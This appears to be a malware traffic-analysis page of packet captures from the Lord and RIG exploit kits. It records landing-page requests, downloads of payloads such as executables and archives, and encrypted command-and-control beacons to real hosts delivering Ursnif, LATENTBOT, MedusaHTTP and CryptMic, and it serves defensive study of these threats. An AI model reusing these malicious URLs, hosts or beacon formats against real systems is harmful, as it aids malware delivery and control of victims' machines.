Text Example

NEW Flash Exploiting Lord EK Exploit Kit Found in the Wild PCAP Download Traffic Sample Analysis

A newly identified exploit kit is targeting vulnerable versions of Adobe’s Flash Player, Malwarebytes security researchers say.

Dubbed “Lord,” the exploit kit (EK) was initially identified by Virus Bulletin‘s Adrian Luca. The toolkit emerged as part of a malvertising chain via the PopCash ad network.

The EK uses a compromised website to redirect unsuspecting victims to its landing page. Initially, the portal was rather rudimentary and in clear text, but the toolkit operators quickly moved to obfuscate it. 

The landing page has a function to check for the presence of Flash Player, in an attempt to exploit the CVE-2018-15982 vulnerability.  One thing that sets the Lord EK apart from other toolkits is the use of the ngrok service to craft custom hostnames, which resulted in rather unusual URLs.  Source : https://www.securityweek.com/new-lord-exploit-kit-emerges

2019-08-01 13:19:06.834029 IP 10.8.1.102.65094 > 10.8.1.1.53: 46499+ A? 7b2cdd48.ngrok.io. (35)
E..?.s….#.
..f
….F.5.+……………7b2cdd48.ngrok.io…..
2019-08-01 13:19:06.891928 IP 10.8.1.1.53 > 10.8.1.102.65094: 46499 1/0/0 A 3.17.202.129 (51)
E..O!……U

..f.5.F.;……………7b2cdd48.ngrok.io…………………
2019-08-01 13:19:06.892846 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [S], seq 3866516344, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4.t@…!P
..f…….P.v[x…… .s……………
2019-08-01 13:19:06.940656 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [S.], seq 2902076389, ack 3866516345, win 64240, options [mss 1460], length 0
E..,!…..?…..
..f.P….+..v[y`………..
2019-08-01 13:19:06.940887 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [.], ack 1, win 64240, length 0
E..(.w@…!Y
..f…….P.v[y..+.P…….
2019-08-01 13:19:06.941145 IP 10.8.1.102.49160 > 3.17.202.129.80: Flags [P.], seq 1:326, ack 1, win 64240, length 325: HTTP: GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
E..m.x@… .
..f…….P.v[y..+.P…….GET /?GHRYb1AYhUQ7CY1Z3sfJHfdgiXnfmlZgiC2g7pV52z6UG8W3Lq4k0vs0ZIdzxVuY HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
DNT: 1
Connection: Keep-Alive
Host: 7b2cdd48.ngrok.io

2019-08-01 13:19:06.941243 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], ack 326, win 64240, length 0
E..(!…..?…..
..f.P….+..v.P….t..
2019-08-01 13:19:07.100312 IP 3.17.202.129.80 > 10.8.1.102.49160: Flags [.], seq 1:1461, ack 326, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
E…!…..:E….
..f.P….+..v.P….-..HTTP/1.1 200 OK
Date: Thu, 01 Aug 2019 17:19:06 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked

4e91



Rig Exploit Kit EK Loads MedusaHTTP Malware Trojan Backdoor Flash Exploit PCAP File Download Traffic Sample

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 16:57:48.518651 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [.], ack 737, win 64240, length 0
E..(.a….^…%s
..e.P……..U.P…. ..
2019-08-12 16:57:49.127786 IP 188.225.37.115.80 > 10.8.12.101.49158: Flags [P.], seq 1:1277, ack 737, win 64240, length 1276: HTTP: HTTP/1.1 200 OK
E..$.b….Y…%s
..e.P……..U.P…cL..HTTP/1.1 200 OK
Server: nginx/1.10.3
Date: Mon, 12 Aug 2019 20:57:46 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 45973
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

2019-08-12 16:59:38.271526 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 1:269, ack 1, win 64240, length 268: HTTP: POST /forums/members/api.jsp HTTP/1.1
E..4..@…..
..e.w…..P.R.az.e.P….%..POST /forums/members/api.jsp HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Host: cdnshop78.world
Content-Length: 192
Expect: 100-continue
Connection: Keep-Alive

2019-08-12 16:59:38.271686 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 269, win 64240, length 0
E..(.b….o{.w..
..e.P..z.e..R.mP….O..
2019-08-12 16:59:38.626952 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [P.], seq 269:461, ack 1, win 64240, length 192: HTTP
E…..@….B
..e.w…..P.R.mz.e.P…….xyz=Jn72I3lUOoD6/K%2BBOVBU21CCWaMR0pT/MMMybhkcYzKf0Fxhd5iX/gM81s2/ry7/68WwIwZcdWQ6itJCp/2EjmcHZrxDMiwaQmK6aOtIdjcivuIb26kGZv0gTBGSgrc2LVstLUlWLVstMl4VcmXCxtXRM%2Bb999Q62gnpsw9gRcO404kDv36jb7g=
2019-08-12 16:59:38.627077 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [.], ack 461, win 64240, length 0
E..(.c….oz.w..
..e.P..z.e..R.-P…….
2019-08-12 16:59:38.701682 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 1:26, ack 461, win 64240, length 25: HTTP: HTTP/1.1 100 Continue
E..A.d….o`.w..
..e.P..z.e..R.-P…N[..HTTP/1.1 100 Continue

2019-08-12 16:59:38.807386 IP 10.8.12.101.49167 > 176.119.29.14.80: Flags [.], ack 26, win 64215, length 0
E..(..@…..
..e.w…..P.R.-z.f.P…….
2019-08-12 16:59:39.444787 IP 176.119.29.14.80 > 10.8.12.101.49167: Flags [P.], seq 26:381, ack 461, win 64240, length 355: HTTP: HTTP/1.1 404 Not Found
E….f….n..w..
..e.P..z.f..R.-P…)m..HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 13 Aug 2019 00:59:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.39

2019-08-12 16:57:48.518525 IP 10.8.12.101.49158 > 188.225.37.115.80: Flags [P.], seq 1:737, ack 1, win 64240, length 736: HTTP: GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=hea
rtfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvPaqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspV
WdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqkmbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
E….H@…..
..e..%s…P..R’….P…!…GET /?ODE2NTA=&aAxgMQgI&fhoaCukK=difference&ZVWHUl=heartfelt&GpNuBWSc=strategy&GuxiOH=already&IhrRqTdNT=heartfelt&PoKpUSKLK=golfer&wZzWF=perpetual&OAGiuQ=community&EIYoYThI=heartfelt&rClHTGxUX=community&tqqvP
aqsy=constitution&lJHtbzKVC=wrapped&tUkJD=wrapped&cmYxKg=referred&ffhdtdf3s=xHjQMrfYbRfFFYrfKPPEUKNEMUnWA06KwYeZhajVF5mxFDHGpbv1FxTspVWdCFSEmvpvdLUHIwWh1UPA&zUugkiAM=detonator&t4gdfgdgf4=SwMzmIZdB1wb8K742kfSyRHIgp_T-BKPYwxB-JqTQbZvjVqk
mbhHd8JyxBCB72kGzuMtYlwgpQxR2afI&NCXtqqIJMzUwNDg0 HTTP/1.1
Accept: text/html, application/xhtml+xml, /
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 188.225.37.115
Connection: Keep-Alive

2019-08-12 18:02:50.728872 IP 10.8.12.101.49205 > 195.22.26.248.80: Flags [P.], seq 246:434, ack 26, win 64215, length 188: HTTP
E….j@…./
..e…..5.P!p…)iiP…….xyz=Rdbf7Sz9YfcZXmTqimFyqnuXh9Qh2EokgRxWjlW6eKlVYMP/0Ie66coOHRDqh72wYWFpR4xyzrqwauM0ArlQyO1qB/flAxIl7E5s3wAGYyWQvmPGYIc2JkmQEzK0NIxSLVstLUlWLVst5B2FNeT80ZFfKTucqMUWcv06uvZYrUmVLNhFF/hGmbs=
2019-08-12 18:02:50.729083 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [.], ack 434, win 64240, length 0
E..(……K_….
..e.P.5.)ii!p.aP….~..
2019-08-12 18:02:50.900794 IP 195.22.26.248.80 > 10.8.12.101.49205: Flags [FP.], seq 26:283, ack 434, win 64240, length 257: HTTP: HTTP/1.1 200 OK
E..)……J]….
..e.P.5.)ii!p.aP….F..HTTP/1.1 200 OK
Server: nginx
Date: Mon, 12 Aug 2019 22:02:47 GMT
Content-Type: text/html
Connection: close
Set-Cookie: btst=98d119f0da644d3d3e6a3eec09296b9b|173.166.146.112|1565647367|1565647367|0|1|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT

RIG Exploit Kit EK Delivers LATENTBOT Malware APT 148.251.255.108 Trojan RAT PCAP file download traffic sample

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
E..(A.@…”m..
.6……P…S….P.@[.G..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
E..( L@.1…6…..

..R.4…P.X{./k..P.@[&i……..
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
E…Kl@…gf..
..R.4…P.X{./k..P.@[.’..GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0

..R.4…P.X}./k..P.?[.x……..
2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
E…L4@…e…
..R.4…P.X}./k..P.?[.?..GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
E…MH@…e…
..R.4…P.X.T/l..P.@U!…GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0
E..(+.@.:….R.4..
..P../l…X..P. …..

….l.%.P~…..+@P.@[……….
2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…N.@…RD..
….l.%.P~…..+@P.@[.x..GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
E..NE!@.y.cv…l..
..P.%..+@~…P..0….HTTP/1.1 200 OK
CONTENT-LENGTH: 0

….l.%.P~…..+fP.@Q……….
2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
E..4N.@…P…
….l.%.P~…..+fP.@Qw…GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[….
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
E..rE)@.y.cJ…l..
..P.&.t.v…%P…….HTTP/1.1 200 OK
CONTENT-TYPE: application/zip

….l.(.P……..P.@[B………
2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
E..#N.@…Q…
….l.(.P……..P.@[….GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-26 16:40:37.395131 IP 148.251.255.108.80 > 192.168.10.20.49704: Flags [P.], seq 1:75, ack 252, win 63989, length 74: HTTP: HTTP/1.1 200 OK
E..rE/@.y.cD…l..
..P.(……..P…….HTTP/1.1 200 OK

R..N…P.@[.\……..
2016-10-26 16:40:38.414779 IP 192.168.10.20.49706 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
E…O8@…Q…
….l.*.P
R..N…P.@[K…GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

….l.4…U….M.P.>^.*..POST /$windows?ID=14103ABFD3F841C783B7B692798FAE94 HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 30

.9.^v…r1jk….~…e….e..!i
2016-10-26 16:46:37.300351 IP 148.251.255.108.443 > 192.168.10.20.49716: Flags [.], ack 3680, win 63279, length 0
E..(Tp@.y.TM…l..
….4..M..U.#P../ue..
2016-10-26 16:46:37.428227 IP 192.168.10.20.49715 > 148.251.255.108.443: Flags [P.], seq 6192:6345, ack 2159, win 15861, length 153
E…V.@…JT..
….l.3…..]…6P.=.M…POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 47

@….+..9.hE…..RZ…..l.#UV….Mk<…2.jcg.^.
2016-10-26 16:46:37.552417 IP 148.251.255.108.443 > 192.168.10.20.49715: Flags [P.], seq 2159:2214, ack 6345, win 63330, length 55
E.._Tu@.y.T….l..
….3…6….P..b.#..HTTP/1.1 200 OK
CONTENT-LENGTH: 16

.A*..6J……..x

E…V.@…JR..
….l.3………mP.=…..POST /$windows?ID=66BF1670FEF345A0B1C166218F0112DD HTTP/1.1
HOST: 148.251.255.108
CONTENT-LENGTH: 45

Quant loader Ursnif malware from RIG Exploit Kit EK PCAP file download Traffic Analysis Sample

2016-10-25 11:46:51.191792 IP 192.168.2.50.49192 > 192.232.206.125.80: Flags [P.], seq 1:249, ack 1, win 16537, length 248: HTTP: GET / HTTP/1.1
E.. ..@……..2…}.(.P…..J..P.@.u=..GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: scadradio.org
Connection: Keep-Alive

2016-10-25 11:46:51.364390 IP 192.232.206.125.80 > 192.168.2.50.49192: Flags [.], ack 249, win 123, length 0
E..(H.@.8……}…2.P.(.J……P..{….

.@……..2..oR.;.P…..m.YP.@.:G……..
2016-10-25 11:46:56.365015 IP 192.168.2.50.49211 > 176.223.111.82.80: Flags [P.], seq 1:458, ack 1, win 16537, length 457: HTTP: GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
E…
.@…   ….2..oR.;.P…..m.YP.@…..GET /?x3qJc7ieKxvGDIA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpPWqUOPYgJH-8SWELU6jQukzbMWd54ilRCF7jJVyLxLQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://scadradio.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: po1289k.kremalopsi.gq
Connection: Keep-Alive

 

2016-10-25 11:47:23.483901 IP 192.168.2.50.49228 > 104.238.131.117.80: Flags [P.], seq 1:341, ack 1, win 16537, length 340: HTTP: GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
E..|..@…;&…2h..u.L.P.s9..0.lP.@.>…GET /ioqmy6chaa/q/index.php?id=74400844&c=1&mk=319850 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: loremipsumdolorsitamet.pw
Connection: Keep-Alive

2016-10-25 11:47:23.601685 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [.], ack 341, win 980, length 0
E..(.M@.8..?h..u…2.P.L.0.l.s:.P…c1..
2016-10-25 11:47:23.854582 IP 104.238.131.117.80 > 192.168.2.50.49228: Flags [P.], seq 1:347, ack 341, win 980, length 346: HTTP: HTTP/1.1 200 OK

E..(..@…’f…2R….M.P.t…..oP.@………..
2016-10-25 11:47:24.271842 IP 192.168.2.50.49229 > 82.165.174.205.80: Flags [P.], seq 1:310, ack 1, win 16537, length 309: HTTP: GET /img/381m6bv285.exe HTTP/1.1
E..]..@…&0…2R….M.P.t…..oP.@…..GET /img/381m6bv285.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: institut-angeetbeaute.fr
Connection: Keep-Alive

2016-10-25 11:47:24.484048 IP 82.165.174.205.80 > 192.168.2.50.49229: Flags [.], seq 1:1351, ack 310, win 516, length 1350: HTTP: HTTP/1.1 200 OK
E..nw\@.v…R……2.P.M…o.t..P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream

!@.-.yJ…….2.P.N..’..C.YP.r..7..
2016-10-25 11:48:01.761117 IP 192.168.2.50.49230 > 46.30.215.31.80: Flags [P.], seq 1:110, ack 1, win 64800, length 109: HTTP: GET /micha/fsa/zj47dn49.iso HTTP/1.1
E….*@…”….2…..N.P.C.Y..’.P.. ….GET /micha/fsa/zj47dn49.iso HTTP/1.1
Host: gingapura.de
Connection: Keep-Alive
Cache-Control: no-cache

2016-10-25 11:48:01.941251 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], ack 110, win 29200, length 0
EH.(.2@.-..8…….2.P.N..’..C..P.r…..
2016-10-25 11:48:01.942021 IP 46.30.215.31.80 > 192.168.2.50.49230: Flags [.], seq 1:1301, ack 110, win 29200, length 1300: HTTP: HTTP/1.1 200 OK
EH.<.3@.-..#…….2.P.N..’..C..P.r..K..HTTP/1.1 200 OK
Date: Tue, 25 Oct 2016 13:17:15 GMT

E..(.}@….)…2%0z..R.P..^.k.wpP.@.P………
2016-10-25 11:48:21.713804 IP 192.168.2.50.49234 > 37.48.122.26.80: Flags [P.], seq 1:178, ack 1, win 16537, length 177: HTTP: GET / HTTP/1.1
E….~@….w…2%0z..R.P..^.k.wpP.@.XF..GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0.0) Gecko/20100101 Firefox/40.0.0
Host: curlmyip.net
Connection: Keep-Alive
Cache-Control: no-cache

RIG Web-based Exploit Kit EK Exploits Flash and loads Ransomware Variant CryptMic Malware PCAP file download 91.121.74.154

2016-09-26 00:40:25.886473 IP 192.168.1.18.51426 > 5.196.126.167.80: Flags [P.], seq 1:512, ack 1, win 16475, length 511: HTTP: GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
E..’.R@………..~….P..W..2.VP.@[….GET /index.php?wX6OcbiYLRbND4M=l3SMfPrfJxzFGMSUb-nJDa9BNUXCRQLPh4SGhKrXCJ-ofSih17OIFxzsmTu2KTKvgJQyfu0SaGyj1BKeO10hjoUeWF8Z5e3x1RSL2x3fipSA9weJYFhC_5DEELY70Qj3zucccs4lkxfTv2JWz-IdUFxE5RgY36TIHLOL-AFiXwE4Ugfbct4lsxaBWiTiJGQ23OWwGTF0kufJ8_w5 HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; rv:11.0) like Gecko
Host: chink12alzona.cyclemanagementassociates.info

2016-09-26 00:40:26.295112 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], ack 512, win 237, length 0
E..(..@.:…..~……P…2.V..Y.P….H..
2016-09-26 00:40:27.640845 IP 5.196.126.167.80 > 192.168.1.18.51426: Flags [.], seq 1:1319, ack 512, win 237, length 1318: HTTP: HTTP/1.1 200 OK
E..N..@.:…..~……P…2.V..Y.P…….HTTP/1.1 200 OK
Server: nginx
Date: Mon, 26 Sep 2016 00:40:57 GMT
Content-Type: application/x-msdownload
Content-Length: 95232
Connection: keep-alive
Accept-Ranges: bytes

2016-09-26 00:40:31.356592 IP 91.121.74.154.443 > 192.168.1.18.51428: Flags [.], seq 9:1327, ack 19, win 257, length 1318
